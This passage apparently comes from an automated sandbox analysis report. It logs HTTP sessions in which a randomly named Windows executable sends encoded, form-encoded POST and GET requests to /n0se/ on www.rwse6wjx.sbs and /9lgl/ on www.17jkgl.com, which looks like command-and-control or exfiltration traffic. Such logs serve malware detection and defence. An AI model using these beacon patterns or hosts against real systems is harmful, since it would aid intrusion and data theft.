                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.550005101.32.205.61805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:35.068353891 CET752OUTPOST /n0se/ HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rwse6wjx.sbs
                                                                                  Referer: http://www.rwse6wjx.sbs/n0se/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 73 6d 44 4d 4f 74 47 69 46 71 4a 41 31 49 70 68 4e 58 35 33 50 65 55 67 32 4f 76 45 37 4a 54 51 61 70 78 31 36 34 76 48 75 35 4a 2b 6d 6d 46 75 78 6a 30 45 4f 79 75 49 33 47 63 79 45 32 4b 45 70 71 62 61 30 6c 66 55 41 41 52 6d 53 76 59 6e 4a 71 6f 36 50 48 78 73 72 4b 33 73 54 64 61 48 47 32 4b 4e 34 4d 5a 6a 38 34 4c 67 38 56 74 45 78 79 70 73 39 46 7a 49 37 55 64 59 6b 6b 59 6f 2f 7a 45 74 53 7a 42 44 55 30 50 7a 4f 4a 41 7a 39 62 50 6a 4b 52 41 43 66 69 58 6a 39 4c 4f 53 31 63 6c 38 6b 55 72 4e 59 5a 63 51 37 5a 6f 77 38 64 4c 45 7a 59 6a 65 4e 44 6e 32 43 74 49 58 39 4b 33 37 4d 41 51 3d
                                                                                  Data Ascii: LDVlCz=smDMOtGiFqJA1IphNX53PeUg2OvE7JTQapx164vHu5J+mmFuxj0EOyuI3GcyE2KEpqba0lfUAARmSvYnJqo6PHxsrK3sTdaHG2KN4MZj84Lg8VtExyps9FzI7UdYkkYo/zEtSzBDU0PzOJAz9bPjKRACfiXj9LOS1cl8kUrNYZcQ7Zow8dLEzYjeNDn2CtIX9K37MAQ=
                                                                                  Dec 12, 2024 00:20:36.572283983 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:20:36 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.550006101.32.205.61805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:37.733057976 CET772OUTPOST /n0se/ HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rwse6wjx.sbs
                                                                                  Referer: http://www.rwse6wjx.sbs/n0se/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 73 6d 44 4d 4f 74 47 69 46 71 4a 41 32 70 35 68 50 32 35 33 4f 2b 55 6a 36 75 76 45 78 70 54 55 61 70 39 31 36 38 58 74 75 4c 39 2b 6e 45 64 75 79 68 63 45 4e 79 75 49 38 6d 63 33 48 47 4b 61 70 71 58 6b 30 67 6e 55 41 47 39 6d 53 76 49 6e 4a 5a 41 37 4a 58 78 75 31 71 32 4b 4f 4e 61 48 47 32 4b 4e 34 4d 4e 4e 38 34 54 67 39 6d 31 45 77 58 4a 72 33 6c 7a 48 76 45 64 59 31 30 59 73 2f 7a 45 54 53 79 64 74 55 33 37 7a 4f 4d 38 7a 39 49 58 6b 41 52 41 41 51 43 58 78 31 2b 54 64 37 50 42 58 68 79 79 75 47 66 74 6f 33 50 5a 61 6d 2f 44 73 67 34 50 6d 64 51 76 42 54 64 70 2b 6e 70 6e 4c 53 58 47 50 74 78 45 38 54 31 77 35 39 6b 49 69 48 75 54 38 54 30 61 47
                                                                                  Data Ascii: LDVlCz=smDMOtGiFqJA2p5hP253O+Uj6uvExpTUap9168XtuL9+nEduyhcENyuI8mc3HGKapqXk0gnUAG9mSvInJZA7JXxu1q2KONaHG2KN4MNN84Tg9m1EwXJr3lzHvEdY10Ys/zETSydtU37zOM8z9IXkARAAQCXx1+Td7PBXhyyuGfto3PZam/Dsg4PmdQvBTdp+npnLSXGPtxE8T1w59kIiHuT8T0aG
                                                                                  Dec 12, 2024 00:20:39.250551939 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:20:38 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.550007101.32.205.61805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:40.390288115 CET1789OUTPOST /n0se/ HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rwse6wjx.sbs
                                                                                  Referer: http://www.rwse6wjx.sbs/n0se/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 73 6d 44 4d 4f 74 47 69 46 71 4a 41 32 70 35 68 50 32 35 33 4f 2b 55 6a 36 75 76 45 78 70 54 55 61 70 39 31 36 38 58 74 75 4c 6c 2b 6e 33 56 75 79 41 63 45 4d 79 75 49 31 47 63 32 48 47 4c 66 70 71 2b 6a 30 67 36 76 41 46 4a 6d 54 4d 77 6e 4c 6f 41 37 41 58 78 75 76 4b 32 65 54 64 62 64 47 32 62 45 34 4d 64 4e 38 34 54 67 39 67 5a 45 30 43 70 72 34 46 7a 49 37 55 64 45 6b 6b 5a 4c 2f 7a 63 6c 53 79 5a 54 54 42 4c 7a 4f 73 4d 7a 75 4c 7a 6b 47 42 41 4f 52 43 57 69 31 2b 57 64 37 50 74 78 68 79 75 45 47 59 42 6f 30 4a 4a 42 7a 37 54 55 2b 34 4c 6d 51 42 54 62 42 4b 68 46 68 72 2f 50 61 55 6a 31 76 67 63 30 45 67 30 62 33 57 31 35 57 61 58 37 43 77 33 56 44 56 5a 66 54 48 50 59 6a 78 34 39 31 46 55 74 6a 72 70 43 4a 46 67 6e 70 74 79 76 62 35 33 41 78 32 69 66 66 79 51 39 58 34 47 30 38 45 46 65 46 4e 43 79 46 74 64 39 45 33 6b 61 34 2f 34 2f 47 74 61 6f 36 41 35 54 35 44 6c 33 34 37 36 55 42 35 39 6c 2b 74 2f 7a 30 38 4d 59 67 36 76 4c 6e 46 66 70 45 37 33 76 2b 67 47 73 4a 48 73 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=smDMOtGiFqJA2p5hP253O+Uj6uvExpTUap9168XtuLl+n3VuyAcEMyuI1Gc2HGLfpq+j0g6vAFJmTMwnLoA7AXxuvK2eTdbdG2bE4MdN84Tg9gZE0Cpr4FzI7UdEkkZL/zclSyZTTBLzOsMzuLzkGBAORCWi1+Wd7PtxhyuEGYBo0JJBz7TU+4LmQBTbBKhFhr/PaUj1vgc0Eg0b3W15WaX7Cw3VDVZfTHPYjx491FUtjrpCJFgnptyvb53Ax2iffyQ9X4G08EFeFNCyFtd9E3ka4/4/Gtao6A5T5Dl3476UB59l+t/z08MYg6vLnFfpE73v+gGsJHsUWn20/bo0rO4/fVDSITbnOLGT5WZbU39JZv0zPRlKy7Qvao4UTkJQv9Rerig6DT0wI775O4qvxDSyKIyBWlyDRDfYJvSq2Iojus7YE/4hFsQgQDlko9QW1iMV5jmWHp2PfVvMA0xy6VAKR1g/lxy3Ev03TiBm4NkWOB5WA1N6dTlnmlqXtkFAXlIMJXnXMaogjcGtjVS3SgDnLorUa5NH/xmafmUkYPtILnxi5ZJLuH1zzxGmhGGPFAGB09F6D0uba74x+heS63u2qtWI1cxcperP1s5MJ8IFi7U2UgO+shJXUrv6o6G7MDnXgtnXIXa9PF3HiN8eN4korokWUqyr5w09qn+UPKz1b5LfwqISAH6HH3YvwnmcvLZ1NsJ+TNAe0YIxv2gdHjJsqgE/5UJHuRkcnvU2aYNBFyD07Z15i9BaAPXVqHDq5taR40XOKrfOLqIvLmII9D7wygj2qhFAVgV0H/7sK3cUkiiOYvFXm0gq3JIv6f3T/JRuBWPwEGYBnIBW7yXWdYaux5ajrRYc4OwB32pPFs4CX9fFoV79Ql1gH0SUEgUveJhnSj700wu7ObH705WYKN9IxGN33gQqvMUQN/I24J9WF6vilnbBJMaefVEh3TTj7XHkDMXMv1X7Jj17I6K3kX+Kef43JkZBQnLDQqcGx1NAf [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.550008101.32.205.61805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:43.044095039 CET503OUTGET /n0se/?LDVlCz=hkrsNdm9A7NEs6AELC9hc5Biy4ux3a/2UN9Ti/zPtL1d4UFJsQdYSGmB1x8mN1/no5/doAmWeXNISuQ7Z6M7ARUekuecQYjdGGqJoetNg5rktHF3zD1BwWzApk9VpjBEpg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.rwse6wjx.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:20:44.566230059 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:20:44 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.55000938.6.78.235805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:52.883976936 CET746OUTPOST /9lgl/ HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.17jkgl.com
                                                                                  Referer: http://www.17jkgl.com/9lgl/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 41 52 69 58 4f 2b 4e 46 50 46 70 4d 47 50 46 6a 48 51 64 33 6a 63 6b 4f 6f 4e 46 36 4c 73 35 6b 6c 62 71 45 49 6d 37 4a 64 46 4d 2f 39 44 73 5a 70 79 6a 39 31 6c 2f 32 76 63 4d 41 76 61 50 47 58 66 7a 66 4f 36 70 68 6c 2f 6a 36 6e 39 4d 57 2f 78 44 6e 30 59 38 45 4a 66 33 55 37 4c 57 74 4d 35 79 37 50 32 55 32 7a 61 70 65 54 4e 51 30 77 77 6c 31 36 42 76 66 49 48 2b 62 38 36 67 76 56 57 62 54 4c 55 42 38 37 32 54 67 54 5a 4d 77 74 32 4a 4b 4d 37 52 31 55 66 75 31 6c 61 57 64 78 63 69 6c 35 61 76 4b 78 5a 41 51 75 30 44 50 41 7a 6d 75 37 50 4f 6a 55 2b 31 33 6b 33 62 31 61 65 31 4b 4f 6d 6b 3d
                                                                                  Data Ascii: LDVlCz=ARiXO+NFPFpMGPFjHQd3jckOoNF6Ls5klbqEIm7JdFM/9DsZpyj91l/2vcMAvaPGXfzfO6phl/j6n9MW/xDn0Y8EJf3U7LWtM5y7P2U2zapeTNQ0wwl16BvfIH+b86gvVWbTLUB872TgTZMwt2JKM7R1Ufu1laWdxcil5avKxZAQu0DPAzmu7POjU+13k3b1ae1KOmk=
                                                                                  Dec 12, 2024 00:20:54.153814077 CET262INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 11 Dec 2024 23:20:53 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Content-Length: 33
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                  Data Ascii: 310Q/Qp/KT\


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.55001038.6.78.235805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:55.573148966 CET766OUTPOST /9lgl/ HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.17jkgl.com
                                                                                  Referer: http://www.17jkgl.com/9lgl/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 41 52 69 58 4f 2b 4e 46 50 46 70 4d 47 76 31 6a 46 7a 31 33 32 4d 6b 50 69 74 46 36 53 38 35 67 6c 62 32 45 49 69 43 4f 64 32 6f 2f 39 6d 51 5a 6f 77 4c 39 37 46 2f 32 37 73 4d 46 68 36 50 33 58 66 2f 74 4f 36 6c 68 6c 2f 48 36 6e 2f 55 57 2f 67 44 67 30 49 38 38 63 76 33 57 6b 62 57 74 4d 35 79 37 50 32 41 49 7a 63 42 65 50 74 67 30 32 56 52 32 35 42 76 63 50 48 2b 62 32 61 67 72 56 57 62 31 4c 57 30 72 37 31 6e 67 54 64 49 77 30 48 4a 4c 43 37 52 4a 61 2f 76 72 74 4c 75 55 38 2f 71 4f 31 35 71 43 68 71 59 33 69 69 79 6c 61 52 75 47 6f 76 69 62 45 74 39 41 31 48 36 63 41 39 6c 36 51 78 79 30 79 6a 56 65 73 37 41 63 6c 4a 6c 73 6c 50 46 74 31 36 73 44
                                                                                  Data Ascii: LDVlCz=ARiXO+NFPFpMGv1jFz132MkPitF6S85glb2EIiCOd2o/9mQZowL97F/27sMFh6P3Xf/tO6lhl/H6n/UW/gDg0I88cv3WkbWtM5y7P2AIzcBePtg02VR25BvcPH+b2agrVWb1LW0r71ngTdIw0HJLC7RJa/vrtLuU8/qO15qChqY3iiylaRuGovibEt9A1H6cA9l6Qxy0yjVes7AclJlslPFt16sD
                                                                                  Dec 12, 2024 00:20:56.845474958 CET262INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 11 Dec 2024 23:20:56 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Content-Length: 33
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                  Data Ascii: 310Q/Qp/KT\


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.55001138.6.78.235805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:58.232774973 CET1783OUTPOST /9lgl/ HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.17jkgl.com
                                                                                  Referer: http://www.17jkgl.com/9lgl/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 41 52 69 58 4f 2b 4e 46 50 46 70 4d 47 76 31 6a 46 7a 31 33 32 4d 6b 50 69 74 46 36 53 38 35 67 6c 62 32 45 49 69 43 4f 64 32 67 2f 39 51 45 5a 70 52 4c 39 36 46 2f 32 6e 38 4d 45 68 36 50 51 58 62 53 6b 4f 36 5a 62 6c 39 76 36 6d 61 49 57 75 69 6e 67 68 34 38 38 44 2f 33 58 37 4c 57 30 4d 2f 53 2f 50 32 51 49 7a 63 42 65 50 72 4d 30 31 41 6c 32 32 68 76 66 49 48 2b 58 38 36 67 44 56 57 44 4c 4c 57 78 57 37 44 58 67 54 35 73 77 76 52 31 4c 4f 37 52 50 58 66 76 6a 74 4b 54 4d 38 2f 47 6f 31 36 32 6f 68 71 67 33 6d 44 50 49 47 68 66 46 38 73 69 61 47 66 78 6d 67 79 71 78 42 72 5a 68 51 43 57 67 35 41 42 56 71 72 6b 61 73 39 74 6e 78 65 4e 66 7a 50 46 55 4f 74 4b 2b 37 57 50 57 72 6d 34 32 4f 6f 2b 42 41 65 34 36 79 44 49 48 74 50 4f 55 64 52 74 74 5a 71 62 36 6a 71 74 68 47 53 34 36 2f 30 6c 47 6f 38 2b 2f 59 45 74 52 2b 42 69 58 37 48 6b 4c 67 47 64 31 6b 75 48 30 32 7a 66 78 7a 30 5a 6a 37 4d 46 36 75 39 71 4b 6b 6a 73 4e 79 6a 78 65 75 6f 41 30 46 6e 67 68 2f 67 50 44 66 42 31 [TRUNCATED]
                                                                                  Data Ascii: 